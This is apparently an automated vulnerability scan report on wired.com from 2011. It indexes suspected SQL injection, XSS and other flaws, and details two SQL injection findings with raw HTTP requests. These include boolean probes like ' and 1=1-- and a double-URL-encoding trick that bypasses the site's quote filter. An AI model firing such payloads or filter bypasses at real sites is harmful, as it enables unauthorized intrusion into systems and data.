wired.com, XSS, CWE-79, CAPEC-86, REST Parameter 1

REST Paramter 1 Vulnerable to XSS | Vulnerability Crawler Report

Report generated by Unforgivable Vulnerabilities, DORK Search, Exploit Research at Wed Jan 12 09:56:56 CST 2011.



DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://www.wired.com/user/login [name of an arbitrarily supplied request parameter]

1.2. http://www.wired.com/video/ [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 1]

2.2. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 2]

2.3. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 3]

2.4. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]

2.5. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]

2.6. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]

2.7. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]

2.8. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]

2.9. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]

2.10. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 5]

2.11. http://www.wired.com/user/login [REST URL parameter 1]

2.12. http://www.wired.com/user/login [REST URL parameter 2]

2.13. http://www.wired.com/user/logout [REST URL parameter 1]

2.14. http://www.wired.com/user/logout [REST URL parameter 2]

2.15. http://www.wired.com/user/registration [REST URL parameter 1]

2.16. http://www.wired.com/user/registration [REST URL parameter 2]

2.17. http://www.wired.com/video/ [REST URL parameter 1]

2.18. http://www.wired.com/video/search/ [REST URL parameter 1]

2.19. http://www.wired.com/video/search/ [REST URL parameter 2]

2.20. http://www.wired.com/video/search/ [REST URL parameter 2]

3. Cookie without HttpOnly flag set

3.1. http://www.wired.com/services/corrections/

3.2. http://www.wired.com/services/newsletters

3.3. http://www.wired.com/user/login

3.4. http://www.wired.com/user/logout

3.5. http://www.wired.com/user/registration

4. Source code disclosure

4.1. http://www.wired.com/magazine/

4.2. http://www.wired.com/magazine/ipad

4.3. http://www.wired.com/playbook/

5. Cross-domain Referer leakage

6. Cross-domain script include

6.1. http://www.wired.com/

6.2. http://www.wired.com/about/blogs

6.3. http://www.wired.com/about/faq/

6.4. http://www.wired.com/about/feedback/

6.5. http://www.wired.com/about/mobile/

6.6. http://www.wired.com/about/press/

6.7. http://www.wired.com/about/privacy-policy/

6.8. http://www.wired.com/about/rss_feeds/

6.9. http://www.wired.com/about/sitemap/

6.10. http://www.wired.com/about/staff_web/

6.11. http://www.wired.com/about/user-agreement/

6.12. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A

6.13. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices

6.14. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header

6.15. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout

6.16. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar

6.17. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover

6.18. http://www.wired.com/autopia/

6.19. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

6.20. http://www.wired.com/blogs/

6.21. http://www.wired.com/cars/

6.22. http://www.wired.com/culture/

6.23. http://www.wired.com/dangerroom/

6.24. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

6.25. http://www.wired.com/entertainment/

6.26. http://www.wired.com/epicenter/

6.27. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

6.28. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/

6.29. http://www.wired.com/gadgetlab/

6.30. http://www.wired.com/gadgets/

6.31. http://www.wired.com/gamelife/

6.32. http://www.wired.com/gaming/

6.33. http://www.wired.com/geekdad/

6.34. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

6.35. http://www.wired.com/inspiredbyyou/

6.36. http://www.wired.com/js/global.js

6.37. http://www.wired.com/magazine/

6.38. http://www.wired.com/magazine/decode/

6.39. http://www.wired.com/magazine/ipad

6.40. http://www.wired.com/medtech/

6.41. http://www.wired.com/nolayout/rssproxy

6.42. http://www.wired.com/playbook/

6.43. http://www.wired.com/politics/

6.44. http://www.wired.com/rawfile/

6.45. http://www.wired.com/reviews/

6.46. http://www.wired.com/reviews/%20

6.47. http://www.wired.com/reviews/category/automotive/

6.48. http://www.wired.com/reviews/category/desktops-and-accessories/

6.49. http://www.wired.com/reviews/category/digital-cameras-and-camcorders/

6.50. http://www.wired.com/reviews/category/gaming-gear/

6.51. http://www.wired.com/reviews/category/home-audio-and-video/

6.52. http://www.wired.com/reviews/category/household/

6.53. http://www.wired.com/reviews/category/media-players/

6.54. http://www.wired.com/reviews/category/mobile-audio/

6.55. http://www.wired.com/reviews/category/mobile-phones/

6.56. http://www.wired.com/reviews/category/notebooks-and-accessories/

6.57. http://www.wired.com/reviews/category/roundups/

6.58. http://www.wired.com/reviews/category/software-and-apps/

6.59. http://www.wired.com/reviews/category/sports-and-outdoors/

6.60. http://www.wired.com/reviews/category/tablets-and-ebook-readers/

6.61. http://www.wired.com/reviews/category/televisions/

6.62. http://www.wired.com/science/

6.63. http://www.wired.com/search

6.64. http://www.wired.com/services/corrections/

6.65. http://www.wired.com/services/newsletters

6.66. http://www.wired.com/software/

6.67. http://www.wired.com/techbiz/

6.68. http://www.wired.com/thisdayintech/

6.69. http://www.wired.com/threatlevel/

6.70. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/

6.71. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/

6.72. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/

6.73. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

6.74. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/

6.75. http://www.wired.com/threatlevel/2011/01/codebreakers-death/

6.76. http://www.wired.com/threatlevel/2011/01/dubai-assassination/

6.77. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/

6.78. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/

6.79. http://www.wired.com/threatlevel/2011/01/video-poker/

6.80. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/

6.81. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

6.82. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

6.83. http://www.wired.com/threatlevel/author/kimzetter/

6.84. http://www.wired.com/threatlevel/category/announcements/

6.85. http://www.wired.com/threatlevel/category/atm-hacking/

6.86. http://www.wired.com/threatlevel/category/bittorrent/

6.87. http://www.wired.com/threatlevel/category/black-hat-conference/

6.88. http://www.wired.com/threatlevel/category/bradley-manning/

6.89. http://www.wired.com/threatlevel/category/breaches/

6.90. http://www.wired.com/threatlevel/category/censorship/

6.91. http://www.wired.com/threatlevel/category/chaos-computer-club/

6.92. http://www.wired.com/threatlevel/category/conferences/

6.93. http://www.wired.com/threatlevel/category/copyrights-and-patents/

6.94. http://www.wired.com/threatlevel/category/coverups/

6.95. http://www.wired.com/threatlevel/category/crime/

6.96. http://www.wired.com/threatlevel/category/crypto/

6.97. http://www.wired.com/threatlevel/category/cybarmageddon/

6.98. http://www.wired.com/threatlevel/category/cyber-warfare/

6.99. http://www.wired.com/threatlevel/category/cyberbullying/

6.100. http://www.wired.com/threatlevel/category/cybersecurity/

6.101. http://www.wired.com/threatlevel/category/defcon/

6.102. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/

6.103. http://www.wired.com/threatlevel/category/e-voting/

6.104. http://www.wired.com/threatlevel/category/elections/

6.105. http://www.wired.com/threatlevel/category/fed-blotter/

6.106. http://www.wired.com/threatlevel/category/glitches-and-bugs/

6.107. http://www.wired.com/threatlevel/category/hacks-and-cracks/

6.108. http://www.wired.com/threatlevel/category/hans-reiser-trial/

6.109. http://www.wired.com/threatlevel/category/identification/

6.110. http://www.wired.com/threatlevel/category/intellectual-property/

6.111. http://www.wired.com/threatlevel/category/lori-drew-trial/

6.112. http://www.wired.com/threatlevel/category/network-neutrality/

6.113. http://www.wired.com/threatlevel/category/nsa/

6.114. http://www.wired.com/threatlevel/category/openleaks/

6.115. http://www.wired.com/threatlevel/category/politics/

6.116. http://www.wired.com/threatlevel/category/porn/

6.117. http://www.wired.com/threatlevel/category/privacy/

6.118. http://www.wired.com/threatlevel/category/rfid/

6.119. http://www.wired.com/threatlevel/category/riaa-litigation/

6.120. http://www.wired.com/threatlevel/category/rsa-conference/

6.121. http://www.wired.com/threatlevel/category/sexting/

6.122. http://www.wired.com/threatlevel/category/spooks-gone-wild/

6.123. http://www.wired.com/threatlevel/category/stuxnet/

6.124. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/

6.125. http://www.wired.com/threatlevel/category/surveillance/

6.126. http://www.wired.com/threatlevel/category/the-courts/

6.127. http://www.wired.com/threatlevel/category/the-ridiculous/

6.128. http://www.wired.com/threatlevel/category/threats/

6.129. http://www.wired.com/threatlevel/category/three-strikes/

6.130. http://www.wired.com/threatlevel/category/tsa/

6.131. http://www.wired.com/threatlevel/category/uncategorized/

6.132. http://www.wired.com/threatlevel/category/watchlists/

6.133. http://www.wired.com/threatlevel/category/wikileaks/

6.134. http://www.wired.com/threatlevel/category/yo-ho-ho/

6.135. http://www.wired.com/threatlevel/tag/4chan/

6.136. http://www.wired.com/threatlevel/tag/aclu/

6.137. http://www.wired.com/threatlevel/tag/al-haramain/

6.138. http://www.wired.com/threatlevel/tag/albert-gonzalez/

6.139. http://www.wired.com/threatlevel/tag/apple-iphone/

6.140. http://www.wired.com/threatlevel/tag/blackhat/

6.141. http://www.wired.com/threatlevel/tag/bradley-manning/

6.142. http://www.wired.com/threatlevel/tag/carding/

6.143. http://www.wired.com/threatlevel/tag/ccc/

6.144. http://www.wired.com/threatlevel/tag/censorship/

6.145. http://www.wired.com/threatlevel/tag/china/

6.146. http://www.wired.com/threatlevel/tag/copyright/

6.147. http://www.wired.com/threatlevel/tag/crime/

6.148. http://www.wired.com/threatlevel/tag/defcon/

6.149. http://www.wired.com/threatlevel/tag/dmca/

6.150. http://www.wired.com/threatlevel/tag/facebook/

6.151. http://www.wired.com/threatlevel/tag/fbi/

6.152. http://www.wired.com/threatlevel/tag/file-sharing/

6.153. http://www.wired.com/threatlevel/tag/first-amendment/

6.154. http://www.wired.com/threatlevel/tag/google/

6.155. http://www.wired.com/threatlevel/tag/hack/

6.156. http://www.wired.com/threatlevel/tag/hacking/

6.157. http://www.wired.com/threatlevel/tag/intellectual-property/

6.158. http://www.wired.com/threatlevel/tag/mpaa/

6.159. http://www.wired.com/threatlevel/tag/nsa/

6.160. http://www.wired.com/threatlevel/tag/obama/

6.161. http://www.wired.com/threatlevel/tag/piracy/

6.162. http://www.wired.com/threatlevel/tag/pirate-bay-trial/

6.163. http://www.wired.com/threatlevel/tag/pirate-bay/

6.164. http://www.wired.com/threatlevel/tag/politics/

6.165. http://www.wired.com/threatlevel/tag/privacy/

6.166. http://www.wired.com/threatlevel/tag/riaa/

6.167. http://www.wired.com/threatlevel/tag/segvec/

6.168. http://www.wired.com/threatlevel/tag/supreme-court/

6.169. http://www.wired.com/threatlevel/tag/surveillance/

6.170. http://www.wired.com/threatlevel/tag/tjx/

6.171. http://www.wired.com/threatlevel/tag/tsa/

6.172. http://www.wired.com/threatlevel/tag/twitter/

6.173. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/

6.174. http://www.wired.com/threatlevel/tag/wikileaks/

6.175. http://www.wired.com/topics/Claude_Cassirer

6.176. http://www.wired.com/topics/Florida

6.177. http://www.wired.com/topics/Spain

6.178. http://www.wired.com/topics/United_States

6.179. http://www.wired.com/topics/Western_Europe

6.180. http://www.wired.com/topics/WikiLeaks.org

6.181. http://www.wired.com/underwire/

6.182. http://www.wired.com/video/

6.183. http://www.wired.com/video/search/

6.184. http://www.wired.com/wiredscience/

7. Email addresses disclosed

7.1. http://www.wired.com/about/faq/

7.2. http://www.wired.com/about/press/

7.3. http://www.wired.com/about/privacy-policy/

7.4. http://www.wired.com/about/user-agreement/

7.5. http://www.wired.com/autopia/

7.6. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

7.7. http://www.wired.com/dangerroom/

7.8. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

7.9. http://www.wired.com/epicenter/

7.10. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

7.11. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/

7.12. http://www.wired.com/gadgetlab/

7.13. http://www.wired.com/gamelife/

7.14. http://www.wired.com/geekdad/

7.15. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

7.16. http://www.wired.com/js/videos/MobileCompatibility.js

7.17. http://www.wired.com/magazine/decode/

7.18. http://www.wired.com/playbook/

7.19. http://www.wired.com/rawfile/

7.20. http://www.wired.com/thisdayintech/

7.21. http://www.wired.com/threatlevel/

7.22. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/

7.23. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/

7.24. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/

7.25. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

7.26. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/

7.27. http://www.wired.com/threatlevel/2011/01/codebreakers-death/

7.28. http://www.wired.com/threatlevel/2011/01/dubai-assassination/

7.29. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/

7.30. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/

7.31. http://www.wired.com/threatlevel/2011/01/video-poker/

7.32. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/

7.33. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

7.34. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

7.35. http://www.wired.com/threatlevel/author/kimzetter/

7.36. http://www.wired.com/threatlevel/category/announcements/

7.37. http://www.wired.com/threatlevel/category/atm-hacking/

7.38. http://www.wired.com/threatlevel/category/bittorrent/

7.39. http://www.wired.com/threatlevel/category/black-hat-conference/

7.40. http://www.wired.com/threatlevel/category/bradley-manning/

7.41. http://www.wired.com/threatlevel/category/breaches/

7.42. http://www.wired.com/threatlevel/category/censorship/

7.43. http://www.wired.com/threatlevel/category/chaos-computer-club/

7.44. http://www.wired.com/threatlevel/category/conferences/

7.45. http://www.wired.com/threatlevel/category/copyrights-and-patents/

7.46. http://www.wired.com/threatlevel/category/coverups/

7.47. http://www.wired.com/threatlevel/category/crime/

7.48. http://www.wired.com/threatlevel/category/crypto/

7.49. http://www.wired.com/threatlevel/category/cybarmageddon/

7.50. http://www.wired.com/threatlevel/category/cyber-warfare/

7.51. http://www.wired.com/threatlevel/category/cyberbullying/

7.52. http://www.wired.com/threatlevel/category/cybersecurity/

7.53. http://www.wired.com/threatlevel/category/defcon/

7.54. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/

7.55. http://www.wired.com/threatlevel/category/e-voting/

7.56. http://www.wired.com/threatlevel/category/elections/

7.57. http://www.wired.com/threatlevel/category/fed-blotter/

7.58. http://www.wired.com/threatlevel/category/glitches-and-bugs/

7.59. http://www.wired.com/threatlevel/category/hacks-and-cracks/

7.60. http://www.wired.com/threatlevel/category/hans-reiser-trial/

7.61. http://www.wired.com/threatlevel/category/identification/

7.62. http://www.wired.com/threatlevel/category/intellectual-property/

7.63. http://www.wired.com/threatlevel/category/lori-drew-trial/

7.64. http://www.wired.com/threatlevel/category/network-neutrality/

7.65. http://www.wired.com/threatlevel/category/nsa/

7.66. http://www.wired.com/threatlevel/category/openleaks/

7.67. http://www.wired.com/threatlevel/category/politics/

7.68. http://www.wired.com/threatlevel/category/porn/

7.69. http://www.wired.com/threatlevel/category/privacy/

7.70. http://www.wired.com/threatlevel/category/rfid/

7.71. http://www.wired.com/threatlevel/category/riaa-litigation/

7.72. http://www.wired.com/threatlevel/category/rsa-conference/

7.73. http://www.wired.com/threatlevel/category/sexting/

7.74. http://www.wired.com/threatlevel/category/spooks-gone-wild/

7.75. http://www.wired.com/threatlevel/category/stuxnet/

7.76. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/

7.77. http://www.wired.com/threatlevel/category/surveillance/

7.78. http://www.wired.com/threatlevel/category/the-courts/

7.79. http://www.wired.com/threatlevel/category/the-ridiculous/

7.80. http://www.wired.com/threatlevel/category/threats/

7.81. http://www.wired.com/threatlevel/category/three-strikes/

7.82. http://www.wired.com/threatlevel/category/tsa/

7.83. http://www.wired.com/threatlevel/category/uncategorized/

7.84. http://www.wired.com/threatlevel/category/watchlists/

7.85. http://www.wired.com/threatlevel/category/wikileaks/

7.86. http://www.wired.com/threatlevel/category/yo-ho-ho/

7.87. http://www.wired.com/threatlevel/tag/4chan/

7.88. http://www.wired.com/threatlevel/tag/aclu/

7.89. http://www.wired.com/threatlevel/tag/al-haramain/

7.90. http://www.wired.com/threatlevel/tag/albert-gonzalez/

7.91. http://www.wired.com/threatlevel/tag/apple-iphone/

7.92. http://www.wired.com/threatlevel/tag/blackhat/

7.93. http://www.wired.com/threatlevel/tag/bradley-manning/

7.94. http://www.wired.com/threatlevel/tag/carding/

7.95. http://www.wired.com/threatlevel/tag/ccc/

7.96. http://www.wired.com/threatlevel/tag/censorship/

7.97. http://www.wired.com/threatlevel/tag/china/

7.98. http://www.wired.com/threatlevel/tag/copyright/

7.99. http://www.wired.com/threatlevel/tag/crime/

7.100. http://www.wired.com/threatlevel/tag/defcon/

7.101. http://www.wired.com/threatlevel/tag/dmca/

7.102. http://www.wired.com/threatlevel/tag/facebook/

7.103. http://www.wired.com/threatlevel/tag/fbi/

7.104. http://www.wired.com/threatlevel/tag/file-sharing/

7.105. http://www.wired.com/threatlevel/tag/first-amendment/

7.106. http://www.wired.com/threatlevel/tag/google/

7.107. http://www.wired.com/threatlevel/tag/hack/

7.108. http://www.wired.com/threatlevel/tag/hacking/

7.109. http://www.wired.com/threatlevel/tag/intellectual-property/

7.110. http://www.wired.com/threatlevel/tag/mpaa/

7.111. http://www.wired.com/threatlevel/tag/nsa/

7.112. http://www.wired.com/threatlevel/tag/obama/

7.113. http://www.wired.com/threatlevel/tag/piracy/

7.114. http://www.wired.com/threatlevel/tag/pirate-bay-trial/

7.115. http://www.wired.com/threatlevel/tag/pirate-bay/

7.116. http://www.wired.com/threatlevel/tag/politics/

7.117. http://www.wired.com/threatlevel/tag/privacy/

7.118. http://www.wired.com/threatlevel/tag/riaa/

7.119. http://www.wired.com/threatlevel/tag/segvec/

7.120. http://www.wired.com/threatlevel/tag/supreme-court/

7.121. http://www.wired.com/threatlevel/tag/surveillance/

7.122. http://www.wired.com/threatlevel/tag/tjx/

7.123. http://www.wired.com/threatlevel/tag/tsa/

7.124. http://www.wired.com/threatlevel/tag/twitter/

7.125. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/

7.126. http://www.wired.com/threatlevel/tag/wikileaks/

7.127. http://www.wired.com/underwire/

7.128. http://www.wired.com/wiredscience/

8. Content type incorrectly stated

8.1. http://www.wired.com/js/ads/google_customize.js

8.2. http://www.wired.com/js/cn-fe-ads/cn.ad.lotame.js

8.3. http://www.wired.com/js/cn-fe-ads/cn.dart.js

8.4. http://www.wired.com/js/cn-fe-common/cn.js

8.5. http://www.wired.com/js/comments/commentBroker.js

8.6. http://www.wired.com/js/comments/prototype.js

8.7. http://www.wired.com/js/ecom/ecomfw.min.js

8.8. http://www.wired.com/js/global.js

8.9. http://www.wired.com/js/jquery-1.3.2.min.js

8.10. http://www.wired.com/js/omniture/s_code.js

8.11. http://www.wired.com/js/videos/MobileCompatibility.js

8.12. http://www.wired.com/js_blogs/json2.js

8.13. http://www.wired.com/js_blogs/popup.js

8.14. http://www.wired.com/threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

8.15. http://www.wired.com/threatlevel/xmlrpc.php



1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.wired.com/user/login [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user/login?1%2527=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 1

HTTP/1.1 503 Service Unavailable
Server: Apache/2.0.52 (Red Hat)
Content-Length: 403
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 15:32:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:32:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /user/login?1%2527%2527=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/login?1%2527%2527=1
Content-Length: 87
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:33:10 GMT
Connection: close
Set-Cookie: JSESSIONID=acbgrU5qBQJolc2__261s; path=/

The URL has moved <a href="https://secure.wired.com/user/login?1%2527%2527=1">here</a>

1.2. http://www.wired.com/video/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wired.com
Path:   /video/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /video/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=300
Expires: Wed, 12 Jan 2011 15:25:26 GMT
Date: Wed, 12 Jan 2011 15:20:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<a href="http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001"><img class='thumb' src="http://brightcove.condenet.com/images/1564549380/1564549380_672363149001_Honda-Corp-Featured-Video-80x60.jpg?pubId=1564549380" /></a></li>
<li class="videoTitle"><a href="http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001">Into the Unknown</a></li>
        <li class="videoDesc">What drives humans to explore? Is the human brain an uncharted frontier unto itself? Join the inquisitive minds at Honda and journey into the unknown with climbers, divers, scientists, astronauts, engineers and other modern-day explorers.</li>
</ul>
</div>
</div>

</div>
<div class='bc_clear'></div>
</div>

</div>
<div id='bc_pop' class='bc_popUpContainer'>
<div id='bc_desc' class='bc_popUpInner'></div>
<div id='bc_popArrow' class='bc_popArrow'></div>
<div id='bc_popArrow_related' class='bc_popArrow_related'></div>
</div>
<script>







var nextVideoURL = "http://www.wired.com/video/latest-videos/latest/1815816633/ces-2011-rants-media-convergence-at-ces/742144985001";


















































...[SNIP]...

Request 2

GET /video/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=292
Expires: Wed, 12 Jan 2011 15:25:37 GMT
Date: Wed, 12 Jan 2011 15:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107714


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
